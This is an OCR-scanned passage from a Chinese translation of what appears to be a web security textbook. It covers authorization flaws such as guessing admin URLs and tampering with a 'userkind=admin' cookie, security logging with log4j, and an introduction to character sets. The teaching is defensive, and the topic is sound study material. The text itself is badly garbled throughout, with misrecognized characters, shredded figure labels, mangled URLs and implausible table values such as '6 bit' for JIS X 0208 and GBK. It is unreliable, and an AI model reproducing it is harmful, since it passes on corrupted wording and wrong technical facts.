只 控制 菜单 的 显示 或 不 显示 

第 二 个 权限 管理 的 失败 例子 是 只 做 菜单 显示 和 不 显示 上 的 控制 。 图 5-25 是 这 样 的 一 个 例子 。 
图 里 显示 的 是 一 个 作为 管理 员 登 录 的 页 面 跳 转 关系 。 

在 这 个 例子 里 ， 如 图 5-25 所 示 ， 在 顶级 菜单 有 指向 管理 员 和 普通 用 户 的 链接 。 


图 5-25 管理 员 登 录 时 的 页 面 流程 


一 般 用 菜单 
http://example.jp/a001.php 

































































以 管理 员 身 份 登录 
http://example.jp/ 
menu .php 























































普通 用 户 功 能 
理 员 用 功能 











Ce 
管理 员 菜单 


http://example.jp/b001.php 
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下 面 再 来 看 看 面向 普通 用 户 的 登录 流程 ， 如 图 5-26 所 示 。 普 通用 户 的 顶级 页 面 里 只 显示 了 
一 个 指向 普通 用 户 功 能 的 链接 ,但 是 如 果 从 普通 用 户 页 面 的 URL 里 的 a001.php 推测 管理 员 的 网 
址 ， 并 在 浏览 器 里 尝试 访问 b001.php 的 话 ， 就 会 看 到 管理 员 的 功能 了 ， 也 许 还 能 够 使 用 里 面 的 





5-26 ”普通 用 户 通过 修改 URL 访问 管理 员 功 能 























一 般 用 菜单 
http:/example.jp/a001.php 



































以 普通 用 户 身份 登录 
http://example.jp/mMenu.php 





改写 URL 
































] 户 功能 


[ed 





管理 员 菜 单 
httpVexample.jp/p001.php 



































通过 直接 修改 URL, | 4 
可 以 访问 管理 员 界 面 ，| ; 
并 且 能 执行 里 面 的 功能 | 修了 






















































































在 这 个 例子 中 ， 如 果 用 户 想 越过 自己 的 权限 使 用 其 他 功能 的 话 ， 需 要 知道 其 URL。 得 到 
URL 的 具体 方法 有 以 下 几 种 。 


根据 规则 按 顺 序 尝试 URL 中 的 字母 或 者 数字 ( 如 图 5-26 所 示 ) 
尝试 admin 或 者 root、manage 等 管理 员 功 能 菜单 里 频繁 使 用 的 词汇 
在 曾经 拥有 权限 的 时 候 记 住 URL 地 址 ， 在 失去 权限 后 利用 记 住 的 URL 访问 管理 员 功 能 


拿 最 后 的 例子 来 说 ， 即 使 把 管理 菜单 的 URL 做 得 很 难 被 推测 ， 也 还 是 存在 被 恶意 使 用 的 可 
能 性 的 。 





























使 用 hidden 参数 或 者 Cookie 保存 权限 信息 

授权 漏洞 的 第 三 种 类 型 就 是 使 用 hidden 参数 或 者 Cookie 来 保存 权限 信息 的 情况 。 比 如 通过 
设置 一 个 userkind=admin 的 Cookie 就 能 使 用 户 能 够 使 用 管理 员 功能 这 样 的 网 站 。 

在 这 种 情况 下 ， 该 Cookie 很 容易 让 人 推测 出 管理 员 的 Cookie 值 ， 即 使 使 用 数字 作为 用 户 类 
型 ， 也 同样 存在 被 恶意 使 用 的 可 能 性 。 
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授权 漏洞 总 结 

在 本 小 节 我 们 对 授权 中 存在 的 3 种 类 型 的 漏洞 进行 了 说 明 。 这 些 漏洞 的 共同 问题 在 于 如 果 对 
URL 、hidden 参数 、Cookie 进行 算 改 的 话 ， 就 可 以 非法 使 用 网 站 的 正常 功能 

要 想 正 确实 现 授 权 功 能 ， 需 要 将 权限 信息 保存 到 会 话 变 量 中 去 ， 这 样 攻击 者 就 不 能 算 改 权限 
信息 了 。 并 且 在 进行 页 面 显 示 或 者 处 理 之 前 ， 还 需要 对 用 户 权 限 进行 检查 。 





























专栏 : 将 私密 信息 嵌入 URL 进行 授权 处 理 COLUMN 


也 有 不 通过 认证 或 会 话 管理 技术 来 实现 授权 的 方法 ， 那 就 是 在 URL 中 嵌入 一 些 私密 信息 ， 
使 只 有 知道 这 个 URL 的 人 才能 访问 。 
将 私密 信息 嵌入 到 URL 中 ， 有 下 面 3 种 方法 。 
将 URL 中 的 文件 名 设 为 非常 长 的 难以 推测 的 随机 字符 串 
在 URL 中 嵌入 一 个 令 牌 
在 URL 中 骸 入 访问 票 ( Access Ticket ) 





























































































































但 不 管 是 哪 种 实现 方式 ， 在 URL 中 嵌入 私密 信息 的 做 法 我 们 都 是 不 推荐 的 。 因 为 这 违反 了 
采用 POST 方法 发 送 私密 信息 的 原则 ( 请 参考 3.1 节 )， 而 且 还 存在 下 面 列 出 的 一 些 非常 现实 的 
风险 。 此 外 ， 它 还 会 导致 个 人 信息 泄露 。 




























































































通过 Referer 泄露 URL 
用 户 自己 将 URL 发 布 到 论坛 等 地 方 将 URL 公开 

搜索 引擎 可 能 会 收录 含有 私密 信息 的 URL 
忆 此 原则 上 应 该 禁止 采用 在 URL 中 岁入 私密 信息 的 方式 来 进行 授权 ， 如 果 迫 不 得 已 不 得 不 
使 用 该 方式 的 话 ， 那 么 应 该 将 URL 的 可 访问 时 限 限制 在 最 短 范围 内 ， 并 且 向 用 户 强 调 公开 此 
URL 的 危险 性 。 
























































































































































5.3.3 ”授权 管理 的 需求 设计 


要 想 正确 实现 授权 功能 ， 必 须 先 要 在 需求 层次 上 进行 必要 的 设计 。 笔 者 在 检查 漏洞 工作 中 参 
加 过 很 多 次 关于 授权 的 审查 ， 但 是 还 从 来 没有 看 到 过 有 谁 能 拿 出 书面 的 授权 设计 文档 ， 来 说 明 他 
们 认为 的 “授权 应 该 是 怎样 的 "。 更 多 情况 下 他 们 是 潜意识 里 认为 授权 管理 就 是 应 该 那么 去 做 的 。 

在 做 权限 管理 的 设计 时 ， 可 以 先 创建 一 个 权限 矩阵 表 。 下 面 以 一 个 权限 管理 比较 复杂 的 应 用 
场景 ASP( Application Service Provider ) 为 例 ， 来 看 一 下 如 何 创 建 权限 矩阵 表 ， 如 图 5-27 所 示 。 
例子 中 的 应 用 以 ASP 的 形式 ,被 公司 A、 公司 B、 公 司 C 所 使 用 。 用 户 中 除了 整个 系统 的 管理 
员 以 外 ， 各 个 公司 还 有 自己 内 部 的 企业 管理 者 用 来 管理 自己 公司 的 员工 等 。 
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图 5-27 ASP 服务 的 例子 
























































































































































































































































系统 管理 员 
管理 管理 管理 
企业 管理 者 企业 管理 者 企业 管理 者 
公司 A 公司 B 公司 C 
表 5-5 权限 矩阵 的 例子 
系统 管理 员 企业 管理 者 普通 用 户 

添加 公 局 © x XxX 
添加 、 删 除 企业 管理 者 @) x x 
添加 、 删 除 公司 员工 用 户 O O x 
修改 自己 密码 O @) O 
修改 别人 密码 O 〇 (只 限 本 公司 用 户 ) 汉 





























如 果 我 们 在 设计 的 时 候 创 建 了 这 样 的 权限 矩阵 ， 就 能 正确 地 进行 后 面 的 开发 和 测试 。 





专栏: 什么 是 角色 


表 5-5 里 的 “系统 管理 员 ”“ 企 业 管 理 者 ”“ 普 通用 户 ” 一 般 我 们 管 他 们 叫 作 角色 ( Role )。 
9 色 是 指 拥 有 一 组 权限 ， 并 用 能 表现 其 职责 的 词汇 来 命名 的 称呼 。 表 5-5 同时 很 好 地 解释 了 角色 
定义 的 问题 。 
9 色 和 用 户 是 不 同 的 概念 ， 用 户 以 某 一 角色 在 系统 中 进行 各 种 活动 。 

笔者 不 推荐 在 实践 中 不 使 用 角色 ， 而 只 使 用 类 似 admin 或 者 root 这 样 一 看 就 是 管理 员 用 户 
的 方法 ， 原 因 有 如 下 两 点 。 


如 果 有 多 个 管理 员 的 话 ， 事 后 调查 会 比较 困难 
管理 员 密 码 被 多 人 公用 ， 容 易 发 生 安全 事故 



















































































































































































































































































































































































































































































所 以 , 应 该 以 一 人 一 个 ID 的 原则 为 每 个 用 户 创建 ID, 并 根据 各 人 的 职责 不 同 分 配 不 同 的 角色 。 





5.3.4 如 何 正确 实现 授权 管理 


用 户 授权 出 现 漏洞 的 时 候 ， 很 多 原因 都 是 只 想 在 页 面 显 示 中 进行 权限 控制 ， 这 是 不 充分 的 。 
正确 的 方法 是 在 任何 操作 之 前 都 应 该 进行 如 下 检查 。 























用 户 是 否 可 以 访问 该 页 面 ( 脚 本 ) 











户 认 证 信息 的 原则 。 
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是 否 有 操作 ( 查看、 修改 、 删 除 等 ) 该 资源 的 权限 
用 户 信息 应 该 保存 在 会 话 变 量 里 ， 以 防止 被 人 算 改 。 这 不 光 是 安全 授权 的 要 求 ， 也 是 保存 用 











根据 保存 在 会 话 里 的 用 户 ID 检查 权限 
权限 信息 不 能 保存 在 Cookie 或 者 hidden 参数 里 


5.3.5 总 结 


在 本 节 中 我 们 介绍 了 在 实现 授权 管理 
系统 。 


E 中 容易 发 生 的 安全 性 问题 ， 以 及 如 何 正 确 地 去 设计 授权 





我 们 也 介绍 了 ， 容 易 导 致 授权 管理 漏洞 发 生 的 原因 ， 其 一 就 是 由 于 开发 者 认为 存放 在 URL 
或 者 表单 的 hidden 参数 、Cookie 等 内 容 不 会 被 算 改 。 正 确 的 实现 方法 是 将 这 些 关 键 信息 都 保 
存在 不 能 被 随意 算 改 的 会 话 里 ， 并 在 需要 指定 权限 才能 进行 的 操作 之 前 进行 权限 检查 。 
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5.4 日 志 输 出 


应 用 程序 输出 的 日 志 在 安全 方面 上 也 有 很 重要 的 意义 ， 下 面 我 们 就 看 看 应 该 如 何 去 考 虑 日 志 
的 输出 。 





5.4.1 日 志 输 出 的 目的 
应 用 程序 的 日 志 之 所 以 在 安全 方面 有 重要 意义 ， 原 因 有 以 下 3 点 。 


通过 日 志 发 现 被 攻击 或 者 事故 的 先兆 ， 可 以 防 患 未 然 
用 于 在 遭受 攻击 或 者 发 生 事故 后 进行 事后 调查 
用 于 进行 应 用 程序 的 运 维 审查 


在 5.1 节 里 我 们 已 经 对 从 日 志 里 发 现 攻击 预兆 进行 了 说 明 。 如 果 日 志 里 记录 的 尝试 登录 或 者 
登录 失败 的 次 数 比 平时 多 的 话 ， 则 很 可 能 是 受到 了 外 部 攻击 。 如 果 想 做 类 似 的 调查 ,那么 日 志 
必须 要 记录 尝试 登录 及 登录 结果 的 信息 才 行 。 

男 一 方面 ， 如 果 Web 应 用 受到 攻击 后 发 生 损 失 ， 也 需要 对 攻击 的 详细 情况 进行 深入 的 调查 ， 
这 时 候 日 志文 件 也 是 不 可 或 缺 的 。 如 果 日 志 没 保存 下 来 ,或 者 保存 的 信息 不 足 ， 要 想 做 更 深入 的 
调查 就 比较 困难 了 。 
























































5.4.2 日 志 种 类 
Web 应 用 里 面 涉及 的 日 志 大 概 有 以 下 几 种 。 


Web 服务 器 (Apache、IIS 等 ) 的 日 志 

应 用 程序 的 日 志 

数据 库 的 日 志 
这 三 种 日 志 都 是 必 不 可 少 的 ,我 们 这 里 仅 对 应 用 程序 的 日 志 做 详细 说 明 。 应 用 程序 的 日 志 

可 以 细 分 为 下 面 几 类 。 

错误 日 志 

访问 ( Access ) 日 志 

调试 (DeBug ) 日 志 


下 面 分 别 说 明 这 3 种 类 型 的 日 志 。 
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首 误 日 志 

错误 日 志 ， 顾 名 思 义 ， 就 是 记录 应 用 程序 里 出 现 的 各 种 错误 信息 的 日 志 。 当 Web 应 用 程序 
内 部 发 生 错误 的 时 候 ， 除 了 在 页 面 内 显示 给 用 户 诸如 “服务 右 忙 ， 请 稍 候 再 试 ”等 信息 外 ， 还 要 
将 错误 的 详细 情况 及 原因 等 记录 到 日 志 里 。 之 所 以 这 么 做 ， 是 因为 将 错误 的 详细 信息 显示 给 用 
户 ， 除 了 使 用 户 困 惑 以 外 毫 无 用 处 ， 而 且 还 可 能 会 给 攻击 者 提供 攻击 线索 。 而 记录 到 日 志 里 ， 能 
为 调查 或 者 发 现 问题 提供 方便 。 

错误 日 志 也 可 以 用 来 检测 攻击 。 比 如 攻击 者 在 尝试 SQL 注入 或 者 目录 遍历 攻击 的 时 候 , 日 
志 中 应 该 存在 很 多 SQL 错误 或 者 文件 打开 错误 。 这 些 错误 正常 情况 下 应 该 是 很 少 发 生 的 ， 如 果 
持续 发 生 这 样 的 错误 的 话 ， 就 要 怀疑 系统 是 否 正 在 遭受 攻击 。 即 使 这 些 错 误 日 志 不 是 由 于 攻击 造 
成 的 ， 考虑 到 提高 应 用 程序 的 稳定 性 ， 也 应 该 对 此 类 错误 进行 详细 调查 并 进行 修改 。 



































访问 日 志 | 

访问 日 志 是 Web 应 用 程序 里 记录 用 户 访问 某 资源 或 者 使 用 某 功 能 的 日 志 。 和 错误 日 志 不 同 
的 是 ,不 管 是 正常 还 是 异常 的 访问 ， 都 需要 记录 到 访问 日 志 里 。 
Web 应 用 程序 刚 出 现 的 时 候 (大 概 在 2004 年 之 前 )， 多 数 应 用 程序 中 只 记录 错误 日 志 ， 也 
就 是 说 很 多 异常 情况 虽然 都 在 应 用 程序 日 志 里 记录 下 来 , 但 是 正常 情况 的 日 志 还 都 基本 依赖 于 
Web 服务 右 记 录 。 不 过 之 后 为 了 应 对 个 人 信息 泄漏 事件 等 ， 人 们 也 开始 逐渐 重视 起 正常 的 访问 
日 志 来 了 。 

为 了 达到 前 面 5.4.1 节 里 说 的 日 志 的 3 个 目标 的 要 求 ， 记 录 正 常 的 访问 日 志 也 是 很 重要 的 。 

另外 ,很 多 法 律 、 规 范 等 也 要 求 应 用 保存 访问 日 志 。 比 如 在 日 本 至 少 就 有 《个 人 信息 保护 
法 入 《金融 商品 交易 法 》 以 及 《Payment Card Industry (PCI ) 数据 安全 法 规 (PCI-DSS )》 等 法 
律 、 法 规 等 对 个 人 信息 、 访 问 日 志 等 做 出 了 明确 的 规定 。 






























































调试 日 志 

调式 日 志 ， 顾 名 思 义 ， 是 用 来 输出 调试 信息 的 日 志 。 调 试 日 志 输出 量 太 大 的 话 ， 可 能 会 影 对 
系统 的 性 能 造成 影响 。 而 且 ， 如 果 调 试 日 志 输 出 的 内 容 过 于 详细 甚至 包括 敏感 信息 的 话 ， 还 可 能 
带 来 个 人 信息 泄露 问题 。 调 试 日 志 一 般 只 在 开发 或 者 测试 环境 中 输出 ， 在 生产 环境 下 则 不 应 该 输 
出 调试 日 志 。 














5.4.3 有关 日 志 输 出 的 需求 
这 一 节 我 们 将 对 在 设计 时 要 考虑 的 日 志 相 关 的 需求 加 以 说 明 。 
需要 记录 到 日 志 里 的 所 有 事件 
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日 志 里 应 包括 的 信息 和 格式 
日 志文 件 保护 

日 志文 件 保 存 位 置 

日 志文 件 保存 期 限 
服务 器 的 时 间 调 整 


需要 记录 到 日 志 里 的 所 有 事件 

需要 记录 到 日 志 里 的 事件 类 型 ， 既 不 能 过 多 也 不 能 太 少 ， 要 根据 日 志 的 使 用 目的 来 决定 都 需 
要 记录 哪些 事件 。 一 般 来 说 涉及 下 面 列 举 得 用 户 认证 、 账 号 管理 等 重要 信息 及 操作 ， 需 要 记录 到 
日 起 里 © 


登录 、 退 出 (包括 成 功 和 失败 两 种 情况 ) 
账号 冻结 

用 户 注册 、 删 除 

修改 密码 

查看 重要 信息 

重要 操作 ( 购买、 转账 支付 、 发 送 邮件 等 ) 











日 志 里 应 包括 的 信息 和 格式 


日 志 里 面 需要 记载 的 信息 ， 根 据 4W1H ( When、Who、Where、What、How ) 的 原则 ， 应 该 
包括 下 面 列 出 的 一 些 内 容 。 

访问 时 间 

远程 IP 地 址 

用 户 ID 

访问 资源 对 象 URL 、 页 面 编号 、 脚 本 ID 等 ) 

操作 类 型 ( 查看 、 修 改 、 删 除 等 ) 

操作 对 象 (资源 ID 等 ) 

操作 结果 ( 成功 或 者 失败 、 处 理 记录 数量 等 ) 


另外 ， 系 统 监 查 可 能 需要 查询 很 多 种 类 型 的 日 志 ， 所 以 日 志 的 格式 最 好 统一 ， 以 方便 日 后 
查看 。 





























日 志文 件 保护 


如 果 日 志文 件 被 自 改 或 者 删除 的 话 ， 那 么 其 存在 的 意义 也 就 没有 了 ， 所 以 对 日 志文 件 自 身 的 
安全 也 必须 给 以 足够 的 重视 并 加 以 保护 。 除 了 文件 被 破坏 以 外 ， 由 于 日 志 中 还 可 能 包含 个 人 信息 


LV 
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或 者 其 他 敏感 信息 等 ， 也 应 该 限制 只 有 有 相关 权限 的 人 才能 查看 日 志 。 
为 了 保护 日 志文 件 ， 尽 可 能 将 其 保存 在 Web 服务 器 或 者 数据 库 服务 器 以 外 的 地 方 ， 并 且 分 
配 日 志 管 理 者 这 一 角色 ， 并 将 此 角色 和 网 站 管理 者 分 离 。 














日 志文 件 保存 位 置 

日 志 可 以 选择 保存 到 文件 里 ， 也 可 以 保存 到 数据 库 中 ,但 是 出 于 上 一 小 节 提 到 的 日 志保 护 的 
目的 ， 最 好 把 日 志保 存 到 单独 的 服务 器 上 。 也 许 这 会 导致 运营 成 本 上 升 ， 所 以 需要 在 设计 阶段 即 
开始 讨论 此 问题 。 


日 志文 件 保存 期 限 

在 最 初 的 设计 阶段 ， 还 要 根据 网 站 性 质 ， 决 定 各 种 日 志文 件 的 保存 期 限 策略 。 但 是 考虑 到 为 
了 方便 对 安全 事件 进行 调查 ， 也 许 很 难 设 置 一 个 合理 的 日 志保 存 期 限 ， 所 以 也 有 人 采用 无 期 限 保 
存 日 志 的 方法 。 

但 是 同时 日 志文 件 里 有 可 能 包含 机 密 信息 ， 如 果 保 存 期 限 变 长 ， 那 有 可 能 提高 信息 泄漏 的 危 
险 ， 这 就 和 上 面 所 说 的 矛盾 了 。 我 们 可 以 将 日 志 定 时 地 复制 到 DVD 光盘 ， 然 后 将 这 些 媒体 保存 
在 物理 上 安全 的 地 方 等 ， 这 样 即 能 延长 日 志保 存 期 限 又 能 保护 日 志 安全 。 




















服务 器 的 时 间 调 整 

单一 日 志文 件 有 时 候 意义 不 是 很 大 ， 更 多 时 候 是 同时 从 Web 服务 器 、 应 用 程序 、 数 据 库 、 
邮件 等 各 种 日 志 同 时 展开 调查 。 在 从 众多 的 日 志 中 寻找 线索 的 时 候 ， 就 需要 统一 各 个 服务 器 的 
时 间 。 

为 了 达到 各 个 服务 器 时 间 统 一 ， 可 以 通过 使 用 NTP ( Network Time Protocol ) 协议 来 进行 服 
务 需 间 时 间 的 同步 设置 。 














5.4.4 ”实现 日 志 输 出 


日 志 的 保存 方法 主要 有 保存 到 文件 或 者 保存 到 数据 库 两 种 ， 我 们 选择 哪 种 实现 都 可 以 。 我 
们 也 可 以 选择 使 用 专门 针对 日 志 而 开发 的 第 三 方 库 。 比 较 有 代表 性 的 第 三 方 日 志 库 包括 为 Java 
准备 的 log4j。log4j 现在 是 apache 基金 会 的 一 个 项 目 ， 现 在 不 仅 是 Java， 还 有 专 供 PHP 使 用 的 
log4php， 以 及 供 微 软 .NET 使 用 的 log4net 等 衍生 产品 了 。 

使 用 log4j 或 者 log4php 的 好 处 有 如 下 几 点 。 


可 以 通过 简单 设置 来 指定 日 志保 存 位 置 


























OD http://logging.apache.org/ 
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根据 日 志 使 用 目的 不 同 ， 可 以 在 不 同 的 保存 位 置 自由 切换 

可 以 通过 配置 文件 配置 日 志 格 式 (也 称 为 Layout ) 

可 以 指定 输出 日 志 的 级 别 ， 并 且 可 以 不 通过 修改 代码 就 能 修改 日 志 输 出 级 别 

log4j 自 带 的 日 志保 存 类 型 包括 以 下 几 种 ， 我 们 甚至 可 以 不 修改 代码 就 能 实现 按 用 途 将 日 志 

分 开 保存 到 不 同 的 地 方 。 

文件 

数据 库 

邮件 

syslog 

Windows 事件 日 志 (NTEVENT ) 


log4j 提供 的 日 志 级 别 有 以 下 几 种 ， 顺 序 为 按 严 重 程度 从 高 到 低 。 


fatal ( 致命 错误 ) 


error (错误 ) 
告 ) 





























warn (和 警 
info( 信息 ) 
debug (调试 ) 
trace( 跟踪 ， 输 出 比 调试 更 详细 的 信息 ) 
一 般 来 说 我 们 会 在 开发 时 将 日 志 输 出 级 别 设置 为 debug， 然 后 在 生产 环境 中 指定 为 info 级 
别 ， 这 样 的 话 不 用 修改 代码 ， 也 能 获取 重要 程度 在 info 以 上 的 日 志 。 





5.4.5 总 结 


在 这 一 节 我 们 主要 针对 日 志 的 重要 性 及 安全 需求 设计 做 了 详细 说 明 。 

从 系统 安全 的 角度 来 看 ， 日 志 不 仅 有 助 于 在 早期 发 现 潜在 的 攻击 事件 ， 还 能 有 助 于 发 生 安全 
事故 后 的 详细 调查 。 

要 想 记 录 有 效 的 日 志 ， 我 们 应 该 遵循 4W1H ( When、Who、Where、What、How ) 的 原则 采 
集 日 志 ， 并 且 确 保 日 志 本 身 的 安全 。 另 外 ， 为 了 同时 能 调查 从 多 人 台 服 务 器 采集 的 日 志 ， 还 需要 通 
过 NTP 来 统一 服务 需 的 时 间 设置 。 

















字符 编码 和 安全 


本 章 将 讲解 在 处 理 字符 编码 时 容易 产生 的 安全 漏洞 。Web 
应 用 程序 中 涉及 字符 串 的 操作 非常 多 ， 如 果 对 字符 编码 的 
处 理 出 现 问 题 的 话 ， 除 了 会 造成 程序 缺陷 ( 即 Bug ) 以 外 ， 
还 可 能 导致 系统 漏洞 。 

本 章 的 前 半 部 分 作为 入 门将 介绍 一 下 字符 集 和 字符 编码 ， 
从 后 半 部 分 开始 讲解 在 处 理 字符 集 或 字符 编码 时 可 能 引起 
的 安全 隐患 ， 最 后 将 讨论 一 下 如 何 正 确 处 理 字符 编码 。 
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6.1 字符 编码 和 安全 概要 


办 


Web 应 用 程序 里 频繁 地 出 现 字 符 串 的 处 理 ， 如 果 在 字符 串 处 理 中 有 考虑 不 周 的 地 方 ， 除 了 
产生 各 种 各 样 的 Bug (尤其 是 乱码 问题 ) 之 外 ， 还 可 能 会 产生 系统 漏洞 。 
在 Web 应 用 中 涉及 字符 编码 处 理 的 地 方 主要 存在 于 下 图 6-1 里 标记 出 来 的 地 方 。 


6-1 Web 应 用 里 涉及 字符 编码 处 理 的 地 方 










































































浏览 器 
输入 HTTP 请 求 
脚本 源 代码 
处 理 应 用 程序 处 理 
显示 而 
HTMUHTTP Wm 
浏览 i 、 
涉及 字符 编码 处 理 的 地 方 





从 上 图 可 以 看 出 ,在 很 多 处 理 环节 我 们 都 必须 要 意识 到 字符 编码 的 存在 。 这 些 和 字符 编码 有 
关 的 设置 或 者 处 理 如 果 不 正确 的 话 ， 很 有 可 能 就 导致 系统 安全 漏洞 的 出 现 。 

本 章 将 会 在 学 习 字符 编码 安全 知识 之 后 ， 对 字符 编码 安全 相关 的 基础 知识 加 以 说 明 。 现 在 广 
泛 使 用 的 “ 层 字符 编码 ”( Character Code ) 这 个 用 语 可 能 有 点 模 楼 两 可 ， 它 实际 上 包含 下 面 两 层 








字符 集 ( Character Set ) 
字符 编码 方式 ( Character Encoding Scheme ) 














从 下 一 节 开 始 我 们 将 分 别 对 这 两 个 概念 加 以 说 明 。 


6.2 ”字符 集 








这 一 六 中 我 们 将 讲述 字符 集 的 相关 知识 。 字 符 集 ， 即 计算 机 中 处 理 的 所 有 字符 的 集合 。 在 厘 
清 字符 集 的 概念 之 后 ， 我 们 会 对 处 理 字 符 集 时 的 注意 事项 进行 简单 说 明 。 











令 什么 是 字符 集 

字符 集 ， 顾名思义 ， 是 一 组 字符 的 集合 。 大 写 英 文人 字母 (A、B、C、…… Z)、 数 字 (0、1、 
Ds ss 9 ) 等 集合 都 是 字符 集 。 在 计算 机 上 处 理 字 符 集 的 时 候 ， 由 于 计算 机 中 的 信息 都 是 以 二 进 
制 方式 存储 的 ， 如 果 直 接 处 理 字符 的 话 会 很 不 方便 ， 所 以 给 每 个 字符 都 分 配 一 个 编号 (符号 ) 来 
进行 标识 。 严 格 来 说 ， 分 配 了 编号 (符号 ) 的 字符 集 叫 作 符 号 化 字符 集 ， 不 过 本 书 的 说 明 里 都 将 
统一 使 用 字符 集 这 一 称呼 。 

表 6-1 是 我 们 总 结 了 比较 常见 的 字符 集 列表 。 


表 6-1 常见 字符 集 


























































































































































































































































































































字符 集 名 称 位 长 对 应 语言 说 明 
ASCIl 7 位 英语 最 早 的 标准 化 字符 集 
ISO-8859-1 8 位 西欧 语言 在 ASCI| 的 基础 上 加 上 了 法 语 、 德 语 带 声调 的 字符 
JIS X 0201 8 位 英文 、 片 假名 | ASCIl 和 片 假名 
JIS X 0208 6 位 语 包括 第 二 基准 在 内 的 汉字 
微软 标准 字符 集 6 位 语 JISX 0201 和 JIS X 0208， 以 及 NEC 和 日 本 IBM 的 非 兼容 字符 
JIS X 0213 6 位 次 包括 第 四 基准 在 内 的 汉字 
Unicode 21 位 多 语言 实际 共用 的 字符 集 
GB2312 6 位 简体 中 文 中 国 国 家 标准 的 简体 中 文字 符 集 
GBK 6 位 中 文 GBK 向 下 兼容 GB2312， 同 时 增加 了 对 繁体 字 的 支持 
GB18030 32 位 中 文 集大成 的 字符 集 ， 兼 容 GB2312 同时 支持 Unicode 
































@ ASCIl 和 ISO-8859-1 

ASCII ( American Standard Code for Information Interchange 的 缩写 ， 有 时 候 也 叫 作 US-ASCII ) 
是 1963 年 美国 制定 的 字符 集 。 它 使 用 7 比特 长 的 整数 来 表示 在 英语 圈 使 用 频繁 的 数字 、 字 母 
(大 小 写 )、 各 种 符号 等 。ASCII 之 前 的 字符 集 都 是 各 厂商 自己 制定 的 ，ASCII 作为 共通 的 字符 
标准 ， 具 有 划时代 的 意义 ， 对 后 来 的 字符 集 发 展 具 有 深远 的 影响 。 

ISO-8859-1 把 ASCII 扩展 到 8 比特 长 ， 除 了 英语 之 外 ， 又 增加 了 法 语 和 德语 等 西欧 语言 里 的 
带 音 调 的 字符 和 符号 等 。ISO-8859-1 也 经 常 被 称 为 Latin-1， 作 为 ASCII 的 替代 品 ， 至 今 仍 在 广 
泛 使 用 。 
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令 JIS? 规定 的 字符 集 
JISX 0201 是 在 ASCII 扩 展 到 8 比特 的 基础 上 ， 加 上 了 片 假名 及 常用 的 日 语 符号 的 字符 集 。 
JISX 0201 和 ASCI 有 一 部 分 编码 是 共通 的 (JIS X0201 是 超级 )， 但 是 也 有 两 个 例外 ， 那 就 是 












































JIS X0201 将 ASCII 中 0x5C 表示 的 反 斜 线 “\” 替换 为 日 元 符号 “于 ”2 , 将 ASCII 中 0x7E 表示 的 
波浪 线 替 换 为 上 划 线 ( Overline )。 尤 其 是 反 斜 线 是 很 容易 发 生 安全 隐患 的 特殊 字符 ， 要 给 予 特别 
重视 。 

ASCII、ISO-8859-1、JIS X 0201 的 包含 关系 如 图 6-2 > 图 6-2 1 字 节 字符 集 的 包含 关系 


所 示 。 JISX0201 
ISO-8859-1 








由 于 JISX0201 不 包括 日 语 中 不 可 缺少 的 平 假名 和 汉 
字 ， 所 以 1978 年 制定 了 JIS X 0208 字符 集 标准 。JIS X 0208 
包括 平 假名 、 片 假名 、 汉 字 (包括 第 1 基准 2965 字 及 第 2 
基准 3390 字 ) 等 ， 使 得 计算 机 的 日 语 处 理 大 步 前 进 。 即 使 
是 到 现在 ，JIS X 0208 也 仍然 保持 着 很 大 的 影响 力 。 

JIS X 0208 虽然 也 包括 罗马 字 (英文 字母 ) 和 数字 , 但 
是 与 ASCII 或 JISX0201 采 用 了 不 同 的 编码 体系 。 所 以 JIS X 0208 的 罗马 字 或 者 片 假名 又 叫 作 
“全 角 罗 马 字 ”“ 全 角 片 假名 ”，ASCII 或 JIS X 0201 的 字符 叫 作 “半角 字符 "， 将 两 者 完全 作为 不 
同 的 字符 来 使 用 (“全 角 ” 和 “半角 ”不 是 正式 的 叫 法 而 是 通常 的 称呼 )。 

之 后 到 了 2000 年 ， 向 下 兼容 JIS X 0208 的 JISX0213 发 布 了 。JIS X 0213 增加 了 第 3 基准 
的 1259 个 汉字 和 第 4 基准 的 2436 个 汉字 。 比 如 尾 贱 骨 的 “ 髓 ”就 是 第 3 基准 的 汉字 。 

最 初 我 们 在 程序 中 不 是 必须 要 考虑 到 JIS X 0213 的 存在 ,但 是 随 着 Windows Vista 支持 全 部 
的 JIS X0213 字符， 不知 不 觉 中 JIS X 0213 也 渐渐 普及 开 来 。 


令 微软 标准 字符 集 

微软 公司 (现在 日 本 微软 ) 在 1993 年 发 布 Windows 3.1 日 语 版 的 时 候 ， 把 之 前 各 个 厂商 独自 
扩展 的 字符 集 统一 起 来 ， 制 定 了 微软 标准 字符 集 。 从 那 之 后 ， 即 使 使 用 不 同 广 商 生产 的 电脑 ， 但 
只 要 是 运行 Windows 3.1 的 话 ， 就 可 以 使 用 共通 的 字符 集 了 。 

微软 标准 字符 集 在 JISX0201 和 JIS X 0208 的 基础 上 又 统一 了 NEC 以 及 日 本 IBM 的 扩展 字 
符 集 。NEC 扩展 字符 集 比较 有 名 的 是 类 似 “Q)” 这 样 带 圈 的 数字 ,日 本 IBM 扩展 汉字 里 比较 有 
名 的 包括 内 田 百 并 2 的“ 并”， 以 及 高 村 莉 的 “高 ”等 。 

微软 标准 字符 集 里 像 带 圆 圈 的 数字 等 很 多 字符 后 来 都 被 JIS X 0213 或 者 Unicode 引入 ， 现 在 
都 成 为 标准 的 字符 了 。 而 且 ， 微 软 标准 字符 集 本 身 也 作为 CP932 代码 页 ( CodePage ) 被 广泛 使 
















































































日 本 工业 规格 ( Japanese Industrial Standards，JIS )， 由 日 本 工业 标准 调查 会 (JISC ) 组 织 制 定 和 审议 。 
同时 这 也 是 人 民 币 符号 。 译 者 注 
夏目 澈 石门 下 的 小 说 家 、 散 文 家 。 
日 本 小 说 家 、 作 家 。 高 是 高 的 异体 字 。 





译 者 注 








译 者 注 


译 者 注 


四 四 昌 日 
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用 。 关 于 CP932 我 们 将 在 后 面 进行 说 明 。 





S Unicode 

前 面 我 们 对 日 本 字符 集 的 历史 做 了 简要 的 说 明 ， 除 日 本 外 ， 各 国 也 都 有 各 自 不 同 的 字符 集 。 
如 果 每 个 国家 都 制定 并 使 用 本 国 的 字符 集 的 话 ， 既 不 利于 信息 的 传播 ， 也 不 利于 软件 产品 的 国际 
化 ， 所 以 制定 世界 统一 的 字符 集 的 呼声 越 来 越 高 。 以 此 为 契机 ， 计 算 机 企业 组 成 的 小 组 制定 了 
Unicode 字符 集 。Unicode 的 第 一 版 1.0 版 是 在 1993 年 公布 的 ， 之 后 一 直 在 不 断 完 善 ， 到 本 书 翻 
